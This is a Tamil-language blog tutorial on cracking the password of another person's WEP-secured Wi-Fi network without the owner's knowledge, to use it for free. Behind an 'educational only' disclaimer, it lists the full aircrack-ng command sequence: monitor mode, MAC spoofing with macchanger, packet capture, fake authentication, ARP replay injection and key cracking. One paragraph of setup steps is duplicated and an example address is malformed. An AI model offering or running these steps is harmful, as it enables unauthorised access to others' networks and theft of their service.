கம்பியில்லா இணைய இணைப்பை வழங்கும் WIFI சேவை இன்று உலக அளவில்
இன்றியமையாத ஒன்றாக மாறிவிட்டது .wifi இன்று உலகின் ஒவ்வொரு மூலைகளிலும்
ஆக்கிரமித்துள்ளது . காரணம் இலகு ,வேகம் கம்பிகள் ,வயர்கள் போன்ற தொல்லைகள்
இல்லாமல் உபயோகிக்க முடியும் என்பதால் ஆகும். சரி பதிவிற்கு வருவோம் wifi
இணைய இணைப்பை பெறுவோர் அதனை பாதுகாக்க Password வைத்து அதனை உபயோகிப்பர்
அவர்களுக்கே தெரியாமல் அந்த Password Hack செய்து இணைய இணைப்பை எவ்வாறு
பெறுவது என்று பார்ப்பதே இந்த பதிவு .
01.தனிப்பட்ட தேவைகளுக்கு மட்டுமே இதனை உபயோகிக்க வேண்டிகொள்கின்றேன்
,குற்ற செயல்கள் மற்றும் சட்டவிரோத செயல்களுக்கு உபயோகிக்க வேண்டாம் .
02.கல்வி நோக்கத்திற்காக மட்டுமே இப்பதிவினை எழுதுகின்றேன் இதனால் ஏற்படுகின்ற சட்ட சிக்கல்களுக்கு நான் பொறுப்பில்லை .
செய்யும் முன் கவனிக்க வேண்டியது
01.இந்த செயல்முறையில் WEP முறைமையில் பாதுகாப்பினை ஏற்படுத்தியுள்ள WIFI
இணைப்பின் PASSWORD மட்டுமே பெற முடியும் WPA முறைமையில் பாதுகாக்க பட்ட
இணைப்பினை HACK செய்ய முடியாது.WPA HACK பற்றி இன்னொரு பதிவில்
தெரிவிக்கின்றேன் .
02.இதனை மேற்கொள்ளும் போது WIFI சிக்னல் உள்ளதா என்பதனை உறுதிப்படுத்தி கொள்ளுங்கள் .
03. ALFA WIRELESS NETWORK ADAPTER இணை உங்கள் கணணினியில் இணைத்துகொள்க
04.BACKTRACK 3 இணை டவுன்லோட் செய்து ஒரு சீடியில் பதிவுசெய்து வைத்துகொள்ளுங்கள் .( நான் BACKTRACK 3 மூலமே இதனை சிறப்பாக உபயோகித்துள்ளேன் ) தற்போது லினக்ஸ் தளம் BACKTRAK5 இனையினையே வழங்குகின்றது
Backtrack 3 Torrent link
Backtrack 5 Download Link
செயல் முறை
சீடியினை உட்செலுத்தி சீடியின் மூலம் உங்கள் கணனியினை பூட் செய்து கொள்ளுங்கள் சீடி லோட் ஆன உடன் கணனியில் வருகின்ற மெனுவில் மூன்றவது மெனுவினை தெரிந்தெடுங்கள் . பின்னர் டாஸ்க் மெனுவில் கருப்புநிரத்தில் உள்ள கமான்ட் ஐகனை சொடுக்கி கமான்ட் பாக்சினை திறந்துகொள்க பின்னர் காமன்ட் பாக்ஸில் பின்வருமாறு டைப் செய்துகொள்ளுங்கள்
Backtrack 3 Torrent link
Backtrack 5 Download Link
செயல் முறை
சீடியினை உட்செலுத்தி சீடியின் மூலம் உங்கள் கணனியினை பூட் செய்து கொள்ளுங்கள் சீடி லோட் ஆன உடன் கணனியில் வருகின்ற மெனுவில் மூன்றவது மெனுவினை தெரிந்தெடுங்கள் . பின்னர் டாஸ்க் மெனுவில் கருப்புநிரத்தில் உள்ள கமான்ட் ஐகனை சொடுக்கி கமான்ட் பாக்சினை திறந்துகொள்க பின்னர் காமன்ட் பாக்ஸில் பின்வருமாறு டைப் செய்துகொள்ளுங்கள்
airmon-ng
இந்த படத்தினை போல் உங்கள் Command பாக்ஸ் தோற்றமளிக்கும் இதில் INTERFACE எனப்துற்கு கீழே உள்ள ra0 இணை எழுதி வைத்துகொள்ளுங்கள்.
இது இந்த செயன் முறை முழுவதும் தேவை படக்கூடியது (எனது இல் interface என
காணப்படக்கூடிய ra0 உங்கள் WIRELESS ADAPTER பொருத்து வேறு படக்கூடியது )
பின்னர் கீழே உள்ள COMMAND களை TYPE செய்க. அடைப்பு குறியில் INTERFACE என காட்டப்பட்டுள்ள இடத்தில உங்கள் INTERFACE இணை பிரதியிடுக.
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
airodump-ng (interface)
இந்த காமன்டினை டைப் செய்தவுடன் உங்கள் பகுதியிலுள்ள WIFI NETWORK
முழுவதும் காட்சியளிக்கும் உங்களுக்கு தேவையான NETWORK வந்தவுடன் CTRL+C
அழுத்தி நிறுத்தி விடுங்கள் .
இந்த படத்தினை போல் காட்சியளிக்கும் உங்கள் கொமான்ட் பாக்ஸில் DATA இற்கு கீழே உள்ளத்தினையும் BSSID இற்கு கீழே உள்ளத்தினையும் மற்றும் ESSID கீழே உள்ளத்தினையும் எழுதிவைது கொள்ளுங்கள் பின்னர் கீழே தரப்பட்ட கமாண்டினை டைப் செய்க
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
உதரணமாக எனது செய்கை
airodump-ng -c 3 -w yoyo --bssid 60:23:88:2d:6f:of
இந்த செயல் முறைக்கு பின்ன்ர கீழே டாஸ்க் பாரில் உள்ள கமான்ட்
ஐகனை கிளிக் செய்து இரண்டாவதாக புதிய கமான்ட் பாக்சினை திறந்து கொள்ளவும்
அதில் பிவரும் கமான்டினை டைப் செய்யவும்
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
மேலேயுள்ள படத்தினை போல் வந்தவுடன் பின்வரும் காமாண்டினையும் டைப் செய்யவும்
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
இறுதி செயல்முறை மேற்கூறப்பட்ட செயல் முறைகள் செய்தவுடன் முதலாவது கமான்ட்
பாக்சினை பாருங்கள் அதில் DATA என்பதன் கீழ் 10000 இணை கடந்திருக்க
வேண்டும் மேலே உள்ள எனது படத்தின் படி 854 கடந்துள்ளது. இது 10000 இணை நெருங்கியவுடன் மூன்றவது கமான்ட் பாக்சினை திறந்து பின்வரும் கமாண்டினை டைப் செய்க
aircrack-ng -b (bssid) (file name-01.cap)
இந்த கமாண்டினை டைப் செய்தவுடன் இந்த படத்தில் உள்ளது போல் WIFI NETWORK இன் PAASWORD HACK செய்யப்பட்டுவிடும் அவ்வளுவு தான் இனிமேல் நீங்கள் எந்த செலவுகளும் இல்லாமல் மூலம் இணைய உலா வரலாம் .